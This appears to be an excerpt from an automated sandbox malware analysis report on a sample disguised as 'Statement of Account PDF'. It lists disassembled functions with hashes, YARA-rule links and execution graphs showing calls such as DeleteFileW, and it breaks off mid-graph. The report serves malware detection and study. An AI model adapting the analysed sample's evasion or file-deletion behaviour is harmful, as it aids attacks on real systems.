                                                        • Instruction ID: 39b8f3beef874d3829c3605c0c7411b30facc49372256750e1c6fcd82f40b678
                                                        • Opcode Fuzzy Hash: 5e7af69d7576065d79f7fb7c321566d01144edff6bfeb6dd78dc1897cbd31232
                                                        • Instruction Fuzzy Hash: 1AB012E51E4200F2AA0063744941DABE641FBF6700F40DC17730550069D8B0C46AE62F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE7F60 Relevance: .0, Instructions: 7COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a395fa17e5ccc614d9133f09f2df3dfc1f53e91879dbc6656f804608b570d0fb
                                                        • Instruction ID: 3b7de6b061446d60b7f8c9282ec3a45da301db3083e440000166a89c328ecda9
                                                        • Opcode Fuzzy Hash: a395fa17e5ccc614d9133f09f2df3dfc1f53e91879dbc6656f804608b570d0fb
                                                        • Instruction Fuzzy Hash: D1B09230190209CFC2009B58E448E6137E8AB08A04F0100F0E1088B632D621F8008A91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04EE13C0 Relevance: .0, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6eed30aeb26fed969a7b9c8c952719105a2d80951b4a79c61f2500f0516919df
                                                        • Instruction ID: 8716e1286d74a2f59af1b1c736dab8c0011cd205ea3fd4cbcd33e9c6264f2c16
                                                        • Opcode Fuzzy Hash: 6eed30aeb26fed969a7b9c8c952719105a2d80951b4a79c61f2500f0516919df
                                                        • Instruction Fuzzy Hash: FAA002942DA05642F81533BF55A50B99408FB95B1DBC1BC56929AD0069F808F649A11F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 06CEC388 Relevance: 5.3, Strings: 4, Instructions: 259COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T+-q$[V~*$[V~*$]\`
                                                        • API String ID: 0-1849991408
                                                        • Opcode ID: 22fc0fe0056cc59416bdedb2bc098cd2186c88b4d96edbfe44465d41d48de7d5
                                                        • Instruction ID: c73db61d9a09d25f768b928b901ccfabc7202edcebf72c61092217950d85224c
                                                        • Opcode Fuzzy Hash: 22fc0fe0056cc59416bdedb2bc098cd2186c88b4d96edbfe44465d41d48de7d5
                                                        • Instruction Fuzzy Hash: B2B1D6B0E15619DFDB44CFAAD5809AEFBB2BF89300F54D92AE425AB214D7309901CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEC378 Relevance: 4.0, Strings: 3, Instructions: 260COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T+-q$[V~*$]\`
                                                        • API String ID: 0-3978741314
                                                        • Opcode ID: d1bd9f183f4f48c4336be9e75d7163dd7d2f8fc5cfcb6454c72327f281389c51
                                                        • Instruction ID: 17e5e43806b0eb0fe51b3801783d8e51da9a3f14770cf752a56af0b061cf9818
                                                        • Opcode Fuzzy Hash: d1bd9f183f4f48c4336be9e75d7163dd7d2f8fc5cfcb6454c72327f281389c51
                                                        • Instruction Fuzzy Hash: 5FB1E8B4E15219DFDB44CFAAD9808AEFBF2BF89300B54D92AE425BB214D7309941CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEA3E0 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q
                                                        • API String ID: 0-1614139903
                                                        • Opcode ID: 74c78b01176ef2d06cc61e2b594a62fb263241ec2333f58023cbe6d2e49e9842
                                                        • Instruction ID: 64c5027dbf59a03feb67ce4faa9f11f96f829f8d297d021ea92a58efdbd511cf
                                                        • Opcode Fuzzy Hash: 74c78b01176ef2d06cc61e2b594a62fb263241ec2333f58023cbe6d2e49e9842
                                                        • Instruction Fuzzy Hash: 59612C70A002498FDB08EFAAE980B9EBBF3FBC4304F14D529D1149B369EB7459058B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CEA3F0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q
                                                        • API String ID: 0-1614139903
                                                        • Opcode ID: cd48ff33f02790da231445506a0910577c859d0ffa365b8b4f8a17a8316ff4bb
                                                        • Instruction ID: dce872ce782ceaa082fc89b4b21e3d93b016a753841e2f52d0849ce73c557f56
                                                        • Opcode Fuzzy Hash: cd48ff33f02790da231445506a0910577c859d0ffa365b8b4f8a17a8316ff4bb
                                                        • Instruction Fuzzy Hash: 20610C70E042498FD748EFAAE980B9EBBF3FBC8304F14D529D1149B369EB7459059B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE7271 Relevance: .4, Instructions: 381COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cbdeba49acf182e2d4348a2758fcc65f92efdfd000080adbdccb650366d3a161
                                                        • Instruction ID: d07a495121e13177f59d7da8bfdec062dc8ecc81a81e9847158fbfcf890ed89a
                                                        • Opcode Fuzzy Hash: cbdeba49acf182e2d4348a2758fcc65f92efdfd000080adbdccb650366d3a161
                                                        • Instruction Fuzzy Hash: E912CA75D1071A8FCB55DF68C880AE9F7B1FF49300F1586AAD458AB211EB70AAC5CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE7280 Relevance: .4, Instructions: 372COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 669dc06fccc5dfcaed7854601d0207cc24b0c6ad22ec2cff461c65c41348ebf4
                                                        • Instruction ID: af5d5076dcac36210d5beb287e8ab15b33958d28dc13030763df829f7f02a0e8
                                                        • Opcode Fuzzy Hash: 669dc06fccc5dfcaed7854601d0207cc24b0c6ad22ec2cff461c65c41348ebf4
                                                        • Instruction Fuzzy Hash: 1012C975D1061A8FCB55DF68C880AD9F7B1FF49300F15C6AAD458AB211EB70AAC5CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 076A2C68 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1710680268.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: true
                                                        • Associated: 00000000.00000002.1710403251.0000000007620000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7620000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da5781af7d09cc46d20fbc1f4a2ce7a3a9788f0e257576b940acde0fe35648cf
                                                        • Instruction ID: 9c4f8a3f8ad98c09ffce7d620f3b28cd8e4585cc1375013299aa394dc94bdac6
                                                        • Opcode Fuzzy Hash: da5781af7d09cc46d20fbc1f4a2ce7a3a9788f0e257576b940acde0fe35648cf
                                                        • Instruction Fuzzy Hash: CFE11AB4E042199FCB14DFA9C5909AEFBB2FF89304F248169E415AB356D731AD41CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 076A3910 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1710680268.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: true
                                                        • Associated: 00000000.00000002.1710403251.0000000007620000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7620000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 11b4956ff584c91c070f89735dbc203401465daf1637874cd25101ebfafa1d5a
                                                        • Instruction ID: cbf4f028488b3bdf1f4f9099104ebb9e3f64125d258814f4abc218a518ec6500
                                                        • Opcode Fuzzy Hash: 11b4956ff584c91c070f89735dbc203401465daf1637874cd25101ebfafa1d5a
                                                        • Instruction Fuzzy Hash: AFE1EAB4E042199FCB14DFA9C5809AEFBF2BF89304F248169D415AB356D731AD41CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 076A34D8 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1710680268.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: true
                                                        • Associated: 00000000.00000002.1710403251.0000000007620000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7620000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 93d64f390bd1bdc34a26077d7c5faed4305b25e9e0bc3d3dfbd68441a1bca60e
                                                        • Instruction ID: 09cf2d58430c4ceb902126214268338d7973aa6645ccbc65afa4c3507ccdf3c5
                                                        • Opcode Fuzzy Hash: 93d64f390bd1bdc34a26077d7c5faed4305b25e9e0bc3d3dfbd68441a1bca60e
                                                        • Instruction Fuzzy Hash: 22E1E9B4E042199FCB14DFA9C5809AEFBB2FF89304F248169E415AB356D731AD41CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CCE6F0 Relevance: .3, Instructions: 303COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707322732.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6cc0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e17624fe91fe577c0ddb56891db3da962316e0f0e95cc8d955e17d82f347021
                                                        • Instruction ID: c31e07358c473475b34b8426aed00b25facd42eb2a453614b200e39ab5f74d7b
                                                        • Opcode Fuzzy Hash: 1e17624fe91fe577c0ddb56891db3da962316e0f0e95cc8d955e17d82f347021
                                                        • Instruction Fuzzy Hash: 84A17270B002549FDB58ABBC841436F2AABAFC8354F14857C9049EB798DE389D4787A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AF148 Relevance: .3, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6dc81984731bf48be11eabd74e3883061bc73e938ee7a001a98d48e28555e6f2
                                                        • Instruction ID: 8cda630ca8788d8f917c5420a90e0d97b6ab9baba685e1a9949bf87dc991af2a
                                                        • Opcode Fuzzy Hash: 6dc81984731bf48be11eabd74e3883061bc73e938ee7a001a98d48e28555e6f2
                                                        • Instruction Fuzzy Hash: CFD10435D20B5A8ACB10EF64D990A9DB7B1FFD5300F10D79AE1093B225EB706AC5CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AAA60 Relevance: .2, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3016c724987823d47b78175fe07621ce818145efd5230e424f47fe483c1ca78e
                                                        • Instruction ID: 654fe7eb238df7c889d89b2b62aae55c2bc4d8a44225c5e38fe11ca3ccb85bf2
                                                        • Opcode Fuzzy Hash: 3016c724987823d47b78175fe07621ce818145efd5230e424f47fe483c1ca78e
                                                        • Instruction Fuzzy Hash: 8381B0B4E15219DFCB44CFA9C68499EFBF2FF89210F14955AD415AB320D334AA42CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074ABED0 Relevance: .2, Instructions: 162COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e9bb6a96043514b56a2a3ae33af0627eb8a920c56af15855e84c3d945de29d51
                                                        • Instruction ID: bf4344e2bf329454942476188b735496ac4692962f6e87d7d2cd4dfbab9d505e
                                                        • Opcode Fuzzy Hash: e9bb6a96043514b56a2a3ae33af0627eb8a920c56af15855e84c3d945de29d51
                                                        • Instruction Fuzzy Hash: 1B61F1F0916A0AFBD744CF91E1C5299BFB2FB89300F20AC96C18AD7168E7349665CB14
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074AD8A8 Relevance: .1, Instructions: 142COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d33b4b6b29e520638c25a6c45e1b5946b9d5e4b8f13ee9e9c4a0846dc9b933af
                                                        • Instruction ID: 44ddc0eebdb766a4e63cb7539bcd14d8efa4f1bcb4fdd9d2102b120c16823318
                                                        • Opcode Fuzzy Hash: d33b4b6b29e520638c25a6c45e1b5946b9d5e4b8f13ee9e9c4a0846dc9b933af
                                                        • Instruction Fuzzy Hash: AC5118B0E1520ADFCB08CFAAE4855EEFBF2EF89210F10942AD516B7754D7345A428F94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074A0006 Relevance: .1, Instructions: 123COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 81589702d7334d7f22c3354636921a0ca5105677997e60e82a4f154074c20b8f
                                                        • Instruction ID: b04f294f6528b85d0333bd1cc0292f3e123f7c130e83a02922cfc5c7da16611e
                                                        • Opcode Fuzzy Hash: 81589702d7334d7f22c3354636921a0ca5105677997e60e82a4f154074c20b8f
                                                        • Instruction Fuzzy Hash: D54191B1D056588FEB1DCF6B8C4069AFBF3AFC5310F19C1BAC458AA225EA3505468F50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074A0040 Relevance: .1, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 268bfa56d5f2cf327d5c8555af14f89ab39bf698adb4c7c9651da89cf605e5f8
                                                        • Instruction ID: e24c2635fc7ec1366616e9fb78e77fe98084a5c2bb6e9e8b19273e56ce95314e
                                                        • Opcode Fuzzy Hash: 268bfa56d5f2cf327d5c8555af14f89ab39bf698adb4c7c9651da89cf605e5f8
                                                        • Instruction Fuzzy Hash: E04153B1D016198BEB1CCF6B8D406DEFAF3AFC9301F18C1BA841CAA254EB7505968F50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 074ABC88 Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709983632.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_74a0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 035cdeb1ea07da5b500d61188999c2b45741f7b408c6c66e4859048e6e8522af
                                                        • Instruction ID: 3b5daebe1b2148ad155bb05c8eaaf91ae179af9634a056b8c894951dde8bf791
                                                        • Opcode Fuzzy Hash: 035cdeb1ea07da5b500d61188999c2b45741f7b408c6c66e4859048e6e8522af
                                                        • Instruction Fuzzy Hash: EF41B2B0E0120AEBDB48CFAAC9815EEFBB2FB89300F24D52AD415A7214D7349A51CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00F125D8 Relevance: .1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 43c93872bbef534c664faab4aadd14bbcfcf57daca15de1f5bca8ec841a996d6
                                                        • Instruction ID: c1870ab8cb6d648fb72928f3315648827ea575f0704974b23bbc7d8de695a042
                                                        • Opcode Fuzzy Hash: 43c93872bbef534c664faab4aadd14bbcfcf57daca15de1f5bca8ec841a996d6
                                                        • Instruction Fuzzy Hash: 8E317C7500C641CBC7922EAA88746957F60FF1336D7660B9AC1A48CCEBD762C0F2E394
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE5570 Relevance: 6.4, Strings: 5, Instructions: 140COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$B$B$Hbq
                                                        • API String ID: 0-1093311442
                                                        • Opcode ID: 26a665f24f1d6753a84d09ceb85a314657a6bde77e70eb32d279aca981f7010e
                                                        • Instruction ID: 3b16b221301b67600f421d9f8ddde5cf63f494b9536f8f81adfd3d3a58761f83
                                                        • Opcode Fuzzy Hash: 26a665f24f1d6753a84d09ceb85a314657a6bde77e70eb32d279aca981f7010e
                                                        • Instruction Fuzzy Hash: 8241EF71B002058FDB98CB7DC88446EBBBAFFC9214764456AE019CB3A1DB31DE06CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06CE84C0 Relevance: 5.3, Strings: 4, Instructions: 315COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq$$^q$$^q$$^q
                                                        • API String ID: 0-314989797
                                                        • Opcode ID: 5140a36ce36ce111bf787a838c64fd42def42cf2d5c7ab369358a1c0353046fd
                                                        • Instruction ID: 39ef19fc54279bc5bee500a7eda09aa1db02e86c7a330040d77f3f4bbce41ba2
                                                        • Opcode Fuzzy Hash: 5140a36ce36ce111bf787a838c64fd42def42cf2d5c7ab369358a1c0353046fd
                                                        • Instruction Fuzzy Hash: 42B1DF30B112048FDBA4DF65C840AAEB7F6BF89310F10856EE416DB395DB74DA86CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:12.4%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:55
                                                        Total number of Limit Nodes:5
                                                        execution_graph 28725 1301000 28727 130101c 28725->28727 28726 1301126 28727->28726 28728 695fa00 GlobalMemoryStatusEx 28727->28728 28729 695f9ef GlobalMemoryStatusEx 28727->28729 28728->28727 28729->28727 28663 1010848 28664 101084e 28663->28664 28665 101091b 28664->28665 28667 101138f 28664->28667 28669 1011393 28667->28669 28668 10114b4 28668->28664 28669->28668 28675 1017fc4 28669->28675 28680 1018002 28669->28680 28685 1018061 28669->28685 28690 1017e98 28669->28690 28695 1017e87 28669->28695 28677 1017fc9 28675->28677 28676 10180f3 28676->28669 28700 1018101 28677->28700 28704 1018110 28677->28704 28682 1018007 28680->28682 28681 10180f3 28681->28669 28683 1018101 DeleteFileW 28682->28683 28684 1018110 DeleteFileW 28682->28684 28683->28681 28684->28681 28687 1018066 28685->28687 28686 10180f3 28686->28669 28688 1018101 DeleteFileW 28687->28688 28689 1018110 DeleteFileW 28687->28689 28688->28686 28689->28686 28692 1017eb1 28690->28692 28691 10180f3 28691->28669 28692->28691 28693 1018101 DeleteFileW 28692->28693 28694 1018110 DeleteFileW 28692->28694 28693->28691 28694->28691 28697 1017e98 28695->28697 28696 10180f3 28696->28669 28697->28696 28698 1018101 DeleteFileW 28697->28698 28699 1018110 DeleteFileW 28697->28699 28698->28696 28699->28696 28701 1018120 28700->28701 28702 1018152 28701->28702 28708 1017800 28701->28708 28702->28676 28705 1018120 28704->28705 28706 1018152 28705->28706 28707 1017800 DeleteFileW 28705->28707 28706->28676 28707->28706 28709 1018170 DeleteFileW 28708->28709 28711 10181ef 28709->28711 28711->28702 28712 1018348 28713 1018352 28712->28713 28714 101836c 28713->28714 28717 695fa00 28713->28717 28721 695f9ef 28713->28721 28718 695fa15 28717->28718 28719 695fc26 28718->28719 28720 695fc41 GlobalMemoryStatusEx 28718->28720 28719->28714 28720->28718 28722 695fa15 28721->28722 28723 695fc26 28722->28723 28724 695fc41 GlobalMemoryStatusEx 28722->28724 28723->28714 28724->28722

                                                        Executed Functions

                                                        Function 06952750 Relevance: 9.0, Strings: 6, Instructions: 1476COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-2392861976
                                                        • Opcode ID: 51f107fd8d80e7fd6baf7d75af0f7c1381370b1fa7ba0d8a2ba90cec17ad17c4
                                                        • Instruction ID: 3a233b670639ef4df57febf89f11dc189f13b3073bdd723c730c47c46113c13c
                                                        • Opcode Fuzzy Hash: 51f107fd8d80e7fd6baf7d75af0f7c1381370b1fa7ba0d8a2ba90cec17ad17c4
                                                        • Instruction Fuzzy Hash: 4FD27B30E006098FCB64DF68C594A9DB7B6FF85300F6585A9D849AB764EB34ED85CF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0695B1F8 Relevance: 8.3, Strings: 6, Instructions: 762COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4126032878.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6950000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-2392861976
                                                        • Opcode ID: 958b53ef18e4624487396350c93e56f8459dd90d63fa4c2ca8c897a94accbf4b
                                                        • Instruction ID: d618ace1ad98ba35e1886a5e6a333af73406cace007422aaa6f9410f5316b790
                                                        • Opcode Fuzzy Hash: 958b53ef18e4624487396350c93e56f8459dd90d63fa4c2ca8c897a94accbf4b
                                                        • Instruction Fuzzy Hash: 7A528030E102098FDF64DF68D5A07ADB7B6FB45310F218925E805EBB99DB35EC818B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06957D48 Relevance: 3.0, Strings: 2, Instructions: 471COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1841 6957d48-6957d66 1842 6957d68-6957d6b 1841->1842 1843 6957d6d-6957d87 1842->1843 1844 6957d8c-6957d8f 1842->1844 1843->1844 1845 6957d91-6957dad 1844->1845 1846 6957db2-6957db5 1844->1846 1845->1846 1847 6957db7-6957dc1 1846->1847 1848 6957dc2-6957dc5 1846->1848 1851 6957dc7-6957dd5 1848->1851 1852 6957ddc-6957dde 1848->1852 1858 6957dee-6957e04 1851->1858 1859 6957dd7 1851->1859 1853 6957de5-6957de8 1852->1853 1854 6957de0 1852->1854 1853->1842 1853->1858 1854->1853 1862 695801f-6958029 1858->1862 1863 6957e0a-6957e13 1858->1863 1859->1852 1864 6957e19-6957e36 1863->1864 1865 695802a-6958034 1863->1865 1875 695800c-6958019 1864->1875 1876 6957e3c-6957e64 1864->1876 1868 6958036-695805f 1865->1868 1869 695808b-6958096 1865->1869 1870 6958061-6958064 1868->1870 1877 6958098-69580dc 1869->1877 1878 695807b-6958088 1869->1878 1872 6958299-695829c 1870->1872 1873 695806a-6958079 1870->1873 1879 69582bf-69582c2 1872->1879 1880 695829e-69582ba 1872->1880 1873->1877 1873->1878 1875->1862 1875->1863 1876->1875 1896 6957e6a-6957e73 1876->1896 1893 69580e2-69580f3 1877->1893 1894 695826d-6958283 1877->1894 1878->1869 1883 695836d-695836f 1879->1883 1884 69582c8-69582d4 1879->1884 1880->1879 1885 6958376-6958379 1883->1885 1886 6958371 1883->1886 1892 69582df-69582e1 1884->1892 1885->1870 1890 695837f-6958388 1885->1890 1886->1885 1897 69582e3-69582e9 1892->1897 1898 69582f9-69582fd 1892->1898 1906 69580f9-6958116 1893->1906 1907 6958258-6958267 1893->1907 1894->1872 1896->1865 1901 6957e79-6957e95 1896->1901 1902 69582ed-69582ef 1897->1902 1903 69582eb 1897->1903 1904 69582ff-6958309 1898->1904 1905 695830b 1898->1905 1915 6957e9b-6957ec5 1901->1915 1916 6957ffa-6958006 1901->1916 1902->1898 1903->1898 1908 6958310-6958312 1904->1908 1905->1908 1906->1907 1920 